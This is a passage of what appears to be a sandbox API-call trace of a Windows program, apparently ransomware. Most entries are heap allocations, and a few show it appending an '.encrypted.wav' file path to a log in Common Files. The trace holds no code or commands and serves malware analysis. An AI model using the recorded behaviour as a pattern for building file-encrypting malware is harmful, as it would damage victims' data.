lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.598] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.599] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x92, lpOverlapped=0x0) returned 1 [0029.599] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.599] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.encrypted.wav\r\n", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0029.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x41) returned 0x88e138 [0029.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.encrypted.wav\r\n", cchWideChar=65, lpMultiByteStr=0x88e138, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 65 [0029.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0029.600] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x40, lpOverlapped=0x0) returned 1 [0029.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.600] CloseHandle (hObject=0x128) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.601] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.601] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.602] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.603] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.603] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.603] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.603] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.606] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 